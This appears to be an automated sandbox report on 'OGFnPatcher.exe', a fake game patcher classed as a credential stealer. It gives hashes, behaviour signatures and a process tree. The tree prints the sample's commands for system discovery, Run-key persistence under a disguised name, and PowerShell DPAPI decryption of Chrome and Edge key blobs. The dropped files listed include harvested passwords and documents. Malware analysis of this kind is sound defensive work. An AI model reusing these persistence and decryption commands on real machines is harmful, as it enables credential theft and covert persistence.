Overview

overview

10

Static

static

10

Retrac Patcher.exe

windows7-x64

7

Retrac Patcher.exe

windows10-2004-x64

7

$PLUGINSDI...er.dll

windows7-x64

3

$PLUGINSDI...er.dll

windows10-2004-x64

3

$PLUGINSDI...ls.dll

windows7-x64

3

$PLUGINSDI...ls.dll

windows10-2004-x64

3

$PLUGINSDI...em.dll

windows7-x64

3

$PLUGINSDI...em.dll

windows10-2004-x64

3

$PLUGINSDI...ll.dll

windows7-x64

3

$PLUGINSDI...ll.dll

windows10-2004-x64

3

LICENSES.c...m.html

windows7-x64

3

LICENSES.c...m.html

windows10-2004-x64

3

OGFnPatcher.exe

windows10-2004-x64

9

d3dcompiler_47.dll

windows10-2004-x64

1

ffmpeg.dll

windows10-2004-x64

1

libEGL.dll

windows10-2004-x64

1

libGLESv2.dll

windows10-2004-x64

1

resources/...e3.dll

windows7-x64

1

resources/...e3.dll

windows10-2004-x64

1

resources/...act.js

windows7-x64

3

resources/...act.js

windows10-2004-x64

3

sqlite-aut...llback

ubuntu-18.04-amd64

1

sqlite-aut...llback

debian-9-armhf

1

sqlite-aut...llback

debian-9-mips

1

sqlite-aut...llback

debian-9-mipsel

1

sqlite-aut...ace.js

windows7-x64

3

sqlite-aut...ace.js

windows10-2004-x64

3

sqlite-aut...al.ps1

windows7-x64

3

sqlite-aut...al.ps1

windows10-2004-x64

3

sqlite-aut...re.vbs

windows7-x64

1

sqlite-aut...re.vbs

windows10-2004-x64

1

sqlite-aut...all-sh

ubuntu-18.04-amd64

1

Resubmissions

21-09-2024 11:34

240921-nprd1azend 10

Analysis

  • max time kernel
    151s
  • max time network
    155s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240802-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-09-2024 11:34

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    OGFnPatcher.exe

  • Size

    177.3MB

  • MD5

    82db6baf5501b11cf7582d68cb173689

  • SHA1

    ff40fcae2ecfb00eb3f1a36521afbdc93db1e6e6

  • SHA256

    17f48d532943a1160b9c171e183599d28b3a03b4943df8d1b5f8af2aaed142fc

  • SHA512

    9d47fc31fec0379b7ec6461401e5cda54f7b64d6ff0a30136e5ad58bb94446cfa6f1e511380eb5bf99f59174e56fdc7a7cd06cf7cf46898c672bf37c36ec4d82

  • SSDEEP

    1572864:s+vbimZ3RqPfrrW/GDt+wy2tXgJdtEaxMz6lMp1rJ/Gk/QeF/anRq9A4CGdhVnau:sA5kyGScXQT

Score
9/10
credential_accessdiscoverypersistencespywarestealer

Malware Config

Signatures

  • Credentials from Password Stores: Credentials from Web Browsers 1 TTPs

    Malicious Access or copy of Web Browser Credential store.

    credential_accessstealer
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

    credential_accessstealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 13 IoCs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs
  • Enumerates processes with tasklist 1 TTPs 3 IoCs
    discovery
  • Checks processor information in registry 2 TTPs 7 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Collects information from the system 1 TTPs 1 IoCs

    Uses WMIC.exe to find detailed system information.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe
    "C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe"
    1⤵
    • Checks computer location settings
    • Checks processor information in registry
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:3828
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3260
      • C:\Windows\system32\tasklist.exe
        tasklist
        3⤵
        • Enumerates processes with tasklist
        • Suspicious use of AdjustPrivilegeToken
        PID:4704
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic logicaldisk get size | more +1"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4712
      • C:\Windows\System32\Wbem\WMIC.exe
        wmic logicaldisk get size
        3⤵
        • Collects information from the system
        • Suspicious use of AdjustPrivilegeToken
        PID:2032
      • C:\Windows\system32\more.com
        more +1
        3⤵
          PID:4540
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
        2⤵
          PID:4924
          • C:\Windows\System32\Wbem\WMIC.exe
            wmic csproduct get uuid
            3⤵
              PID:100
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /d /s /c "wmic OS get caption, osarchitecture | more +1"
            2⤵
            • Suspicious use of WriteProcessMemory
            PID:4312
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic OS get caption, osarchitecture
              3⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:1108
            • C:\Windows\system32\more.com
              more +1
              3⤵
                PID:3772
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:1864
              • C:\Windows\System32\Wbem\WMIC.exe
                wmic cpu get name
                3⤵
                • Suspicious use of AdjustPrivilegeToken
                PID:228
              • C:\Windows\system32\more.com
                more +1
                3⤵
                  PID:2084
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1260
                • C:\Windows\System32\Wbem\WMIC.exe
                  wmic PATH Win32_VideoController get name
                  3⤵
                  • Detects videocard installed
                  PID:320
                • C:\Windows\system32\more.com
                  more +1
                  3⤵
                    PID:1748
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                  2⤵
                    PID:1448
                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                      3⤵
                      • Suspicious behavior: EnumeratesProcesses
                      PID:3268
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
                    2⤵
                      PID:1152
                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
                        3⤵
                        • Suspicious behavior: EnumeratesProcesses
                        PID:548
                    • C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe
                      "C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe" --type=gpu-process --user-data-dir="C:\Users\Admin\AppData\Roaming\patcher" --gpu-preferences=UAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2164,i,6884902397894312204,5445439030798024804,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2156 /prefetch:2
                      2⤵
                        PID:4480
                      • C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe
                        "C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --user-data-dir="C:\Users\Admin\AppData\Roaming\patcher" --field-trial-handle=2388,i,6884902397894312204,5445439030798024804,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2372 /prefetch:3
                        2⤵
                          PID:3416
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=3828 get ExecutablePath"
                          2⤵
                            PID:3256
                            • C:\Windows\System32\Wbem\WMIC.exe
                              wmic process where processid=3828 get ExecutablePath
                              3⤵
                                PID:4708
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /d /s /c "reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v System32Kernal /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe -silent" /f"
                              2⤵
                                PID:3984
                                • C:\Windows\system32\reg.exe
                                  reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v System32Kernal /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe -silent" /f
                                  3⤵
                                  • Adds Run key to start application
                                  PID:1796
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                2⤵
                                  PID:4532
                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                    3⤵
                                    • Suspicious behavior: EnumeratesProcesses
                                    PID:3248
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                  2⤵
                                    PID:2716
                                    • C:\Windows\system32\tasklist.exe
                                      tasklist
                                      3⤵
                                      • Enumerates processes with tasklist
                                      PID:4344
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /d /s /c "tasklist"
                                    2⤵
                                      PID:4496
                                      • C:\Windows\system32\tasklist.exe
                                        tasklist
                                        3⤵
                                        • Enumerates processes with tasklist
                                        PID:888
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,201,56,127,79,121,27,69,175,124,126,87,89,19,7,241,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,94,118,215,86,104,36,190,210,191,158,213,118,69,65,171,77,134,208,103,139,123,215,32,203,243,251,121,135,219,58,98,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,217,107,72,193,90,9,71,240,156,102,155,85,167,17,230,124,188,26,17,11,83,181,231,73,17,24,66,153,246,3,30,213,48,0,0,0,15,49,109,31,45,121,15,98,19,6,96,233,179,52,141,22,48,238,204,202,154,156,95,146,132,221,232,177,191,178,133,7,62,137,116,50,1,225,8,21,127,52,216,165,130,3,213,65,64,0,0,0,0,162,28,187,117,113,235,27,148,77,112,253,157,81,53,20,64,111,73,197,84,131,170,187,105,129,6,90,31,5,83,187,142,34,81,198,165,62,205,34,247,140,67,78,230,75,221,57,211,121,140,116,127,134,133,186,114,166,150,59,86,213,217,158), $null, 'CurrentUser')"
                                      2⤵
                                      • An obfuscated cmd.exe command-line is typically used to evade detection.
                                      PID:2944
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,201,56,127,79,121,27,69,175,124,126,87,89,19,7,241,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,94,118,215,86,104,36,190,210,191,158,213,118,69,65,171,77,134,208,103,139,123,215,32,203,243,251,121,135,219,58,98,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,217,107,72,193,90,9,71,240,156,102,155,85,167,17,230,124,188,26,17,11,83,181,231,73,17,24,66,153,246,3,30,213,48,0,0,0,15,49,109,31,45,121,15,98,19,6,96,233,179,52,141,22,48,238,204,202,154,156,95,146,132,221,232,177,191,178,133,7,62,137,116,50,1,225,8,21,127,52,216,165,130,3,213,65,64,0,0,0,0,162,28,187,117,113,235,27,148,77,112,253,157,81,53,20,64,111,73,197,84,131,170,187,105,129,6,90,31,5,83,187,142,34,81,198,165,62,205,34,247,140,67,78,230,75,221,57,211,121,140,116,127,134,133,186,114,166,150,59,86,213,217,158), $null, 'CurrentUser')
                                        3⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:3928
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,201,56,127,79,121,27,69,175,124,126,87,89,19,7,241,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,121,162,92,254,76,172,230,174,98,220,161,66,174,166,47,68,200,13,123,128,152,149,208,91,195,234,47,255,249,175,0,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,198,23,48,245,211,211,228,234,160,218,22,107,134,175,243,65,105,168,182,29,205,235,76,179,178,192,87,255,168,160,6,154,48,0,0,0,211,70,245,94,52,97,38,12,76,52,209,104,240,43,55,96,112,117,226,94,35,26,42,105,44,26,156,248,58,145,131,96,94,67,203,96,14,245,233,144,23,209,209,14,202,112,51,222,64,0,0,0,68,74,159,117,33,69,56,22,210,23,222,252,199,47,128,62,9,191,159,208,97,231,84,22,70,123,16,192,250,122,23,221,132,161,232,25,62,228,100,1,64,199,113,18,19,130,239,242,160,166,49,2,166,90,122,197,119,180,219,215,197,185,125,13), $null, 'CurrentUser')"
                                      2⤵
                                      • An obfuscated cmd.exe command-line is typically used to evade detection.
                                      PID:4368
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,27,201,56,127,79,121,27,69,175,124,126,87,89,19,7,241,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,0,121,162,92,254,76,172,230,174,98,220,161,66,174,166,47,68,200,13,123,128,152,149,208,91,195,234,47,255,249,175,0,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,198,23,48,245,211,211,228,234,160,218,22,107,134,175,243,65,105,168,182,29,205,235,76,179,178,192,87,255,168,160,6,154,48,0,0,0,211,70,245,94,52,97,38,12,76,52,209,104,240,43,55,96,112,117,226,94,35,26,42,105,44,26,156,248,58,145,131,96,94,67,203,96,14,245,233,144,23,209,209,14,202,112,51,222,64,0,0,0,68,74,159,117,33,69,56,22,210,23,222,252,199,47,128,62,9,191,159,208,97,231,84,22,70,123,16,192,250,122,23,221,132,161,232,25,62,228,100,1,64,199,113,18,19,130,239,242,160,166,49,2,166,90,122,197,119,180,219,215,197,185,125,13), $null, 'CurrentUser')
                                        3⤵
                                        • Suspicious behavior: EnumeratesProcesses
                                        PID:4560
                                    • C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe
                                      "C:\Users\Admin\AppData\Local\Temp\OGFnPatcher.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\patcher" --gpu-preferences=UAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAhAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1388,i,6884902397894312204,5445439030798024804,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand --variations-seed-version --mojo-platform-channel-handle=2780 /prefetch:8
                                      2⤵
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1504

                                  Network

                                  MITRE ATT&CK Enterprise v15

                                  Replay Monitor

                                  Loading Replay Monitor...

                                  Downloads

                                  • C:\ProgramData\ecc61ebaed81860509b27c44990237c9\Browsers\Passwords.txt
                                    Filesize

                                    19B

                                    MD5

                                    c4efd9a7b61ebf43b608440be5e33369

                                    SHA1

                                    926418256c277f1b11b575ec6e92ce6a844612f7

                                    SHA256

                                    ed4280859199da5a8f25c0c6d533d0873460ac63368c14a69bbd863ea4bfb30f

                                    SHA512

                                    9ea97363868d61d3d51bd3804d638b71ba8dc65260800b3a54051b4725cf08e9d9880a12422a549d94a339c7267e858a7ff5ca9428d64051657134b5c6c20745

                                    Download Submit

                                  • C:\ProgramData\ecc61ebaed81860509b27c44990237c9\Files\ApproveTest.pdf
                                    Filesize

                                    896KB

                                    MD5

                                    2796634e7582fd3b91eaf3ac09a79dd1

                                    SHA1

                                    35a73fa55e81832cad3aafd472a282e6729c2737

                                    SHA256

                                    c83e57aedf946aa1973dcf063571119d7ab7d4fa9f60a7789f603e86778a6713

                                    SHA512

                                    33609100739e5482d7cf1c7cd89e11bb884855e3223c0be0838d6ac48dc85199b83056748cac521236c5814e8cf755e1847896e3d2f349c54ca14fe9f44d0288

                                    Download Submit

                                  • C:\ProgramData\ecc61ebaed81860509b27c44990237c9\Files\CompleteSelect.docx
                                    Filesize

                                    14KB

                                    MD5

                                    3c824a1eb1e8736ec72dab988264e104

                                    SHA1

                                    77c0b7e07b221d15ac235aad66b4a38d7ba8a25f

                                    SHA256

                                    315f6d1363844799086a9f9ddaae1e63dd2caeb511d94c71a7cd7fd52fcd4f2f

                                    SHA512

                                    4c3f550b92bef16fccc396870604df647cf3ccf6c4744ab1ec94b323f65cbdc53e839407b1f6b8d82cea155fd9fa1e66491942666390a1ea88614fbafcab0d70

                                    Download Submit

                                  • C:\ProgramData\ecc61ebaed81860509b27c44990237c9\Files\ExportUnblock.docx
                                    Filesize

                                    618KB

                                    MD5

                                    61ded64fb04a39d0b43c2f4f39fdf5fe

                                    SHA1

                                    15ae034c23b867b3fc1c4fda3f86a9490360359a

                                    SHA256

                                    9c05aaf53bfd0a4700413415cd95f87a83de77621d603a5a3512f47caf007a4f

                                    SHA512

                                    b890adc60c5adc9075d046269fa020d37cb6302478b11af516d96ec84950942413c2040319addc463b5929fe892a20cfb177f9b44ccb191c96cc3379f2e2e98e

                                    Download Submit

                                  • C:\ProgramData\ecc61ebaed81860509b27c44990237c9\Files\PingAssert.doc
                                    Filesize

                                    472KB

                                    MD5

                                    b5f8e98d1c1890344b653f661a65bd75

                                    SHA1

                                    b21a7ca7bb521b526f2ff5b8e5409bf997f7db96

                                    SHA256

                                    eaa4c88d96f05a2d61392461e484824d2a7c7592e58428ef7fead0e1b8b42e49

                                    SHA512

                                    bba429b788e4bd4cbdb07de905b857eeeee5daa8fddd8c42d7ae60cec2c49429baa718ab477064d4b0df0c3b9d02588e403758544d50db427148eca9028044f0

                                    Download Submit

                                  • C:\ProgramData\ecc61ebaed81860509b27c44990237c9\Files\SetExport.odt
                                    Filesize

                                    211KB

                                    MD5

                                    a6f1e0be2f70cc5277cf539d73231f64

                                    SHA1

                                    14fea6c6ff7b064e594b2f4253be4c20771dad94

                                    SHA256

                                    5fb0d0062e924c0d0dafaec3e6a36d574d092d5d9ad73fe748573eb7807a5728

                                    SHA512

                                    8e36cc5d8e20108a8f02e8a159c178cc7017ca7ea0de0370012b0a96e86a25f3055c7f1cf437d5262cda93a9c4f40d9646ba8cc834d5b1b35bd85fc6a92fccf8

                                    Download Submit

                                  • C:\ProgramData\ecc61ebaed81860509b27c44990237c9\Files\SkipReceive.docx
                                    Filesize

                                    16KB

                                    MD5

                                    f5475cc1da5492f5913fa4bbefee40ae

                                    SHA1

                                    9d5157eb20e979a4f4d95a7d9ea6870fbbfa56bb

                                    SHA256

                                    2643edae07432f9d985968c4a7652a356f6007625c15db551c7c4dd481d60faa

                                    SHA512

                                    aaca128eb70b3aedab0b6ed718a237c8f4a0238dc11a6be4a9aace260e23c7693e8d01bf3f8962becae6ec9fa035b98e027d12da4d81b3f78cafd40b83970195

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
                                    Filesize

                                    2KB

                                    MD5

                                    6cf293cb4d80be23433eecf74ddb5503

                                    SHA1

                                    24fe4752df102c2ef492954d6b046cb5512ad408

                                    SHA256

                                    b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

                                    SHA512

                                    0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    Filesize

                                    64B

                                    MD5

                                    5caad758326454b5788ec35315c4c304

                                    SHA1

                                    3aef8dba8042662a7fcf97e51047dc636b4d4724

                                    SHA256

                                    83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

                                    SHA512

                                    4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    Filesize

                                    64B

                                    MD5

                                    446dd1cf97eaba21cf14d03aebc79f27

                                    SHA1

                                    36e4cc7367e0c7b40f4a8ace272941ea46373799

                                    SHA256

                                    a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

                                    SHA512

                                    a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                    Filesize

                                    1KB

                                    MD5

                                    8e26941f21dac5843c6d170e536afccb

                                    SHA1

                                    26b9ebd7bf3ed13bc51874ba06151850a0dac7db

                                    SHA256

                                    316f6ce22306f3018f9f57435ea75092633097182646f7e4ca23e2e2aa1393c0

                                    SHA512

                                    9148227032d98d49baf0d81a7435ba3adc653d7790245140acc50c38de00839d26a661b92f6754b15bab54fe81fbcf9003692fd7bef09027f11ef703a5879e62

                                    Download Submit

                                  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_bcslh5jg.3s2.ps1
                                    Filesize

                                    60B

                                    MD5

                                    d17fe0a3f47be24a6453e9ef58c94641

                                    SHA1

                                    6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                    SHA256

                                    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                    SHA512

                                    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                    Download Submit

                                  • memory/548-12-0x000002EEE6400000-0x000002EEE6422000-memory.dmp

                                    Filesize

                                    136KB

                                    Download

                                  • memory/1504-144-0x0000028371790000-0x0000028371791000-memory.dmp

                                    Filesize

                                    4KB

                                    Download

                                  • memory/1504-138-0x0000028371790000-0x0000028371791000-memory.dmp

                                    Filesize

                                    4KB

                                    Download

                                  • memory/1504-140-0x0000028371790000-0x0000028371791000-memory.dmp

                                    Filesize

                                    4KB

                                    Download

                                  • memory/1504-139-0x0000028371790000-0x0000028371791000-memory.dmp

                                    Filesize

                                    4KB

                                    Download

                                  • memory/1504-145-0x0000028371790000-0x0000028371791000-memory.dmp

                                    Filesize

                                    4KB

                                    Download

                                  • memory/1504-150-0x0000028371790000-0x0000028371791000-memory.dmp

                                    Filesize

                                    4KB

                                    Download

                                  • memory/1504-149-0x0000028371790000-0x0000028371791000-memory.dmp

                                    Filesize

                                    4KB

                                    Download

                                  • memory/1504-148-0x0000028371790000-0x0000028371791000-memory.dmp

                                    Filesize

                                    4KB

                                    Download

                                  • memory/1504-147-0x0000028371790000-0x0000028371791000-memory.dmp

                                    Filesize

                                    4KB

                                    Download

                                  • memory/1504-146-0x0000028371790000-0x0000028371791000-memory.dmp

                                    Filesize

                                    4KB

                                    Download

                                  • memory/3928-64-0x0000022E6F200000-0x0000022E6F250000-memory.dmp

                                    Filesize

                                    320KB

                                    Download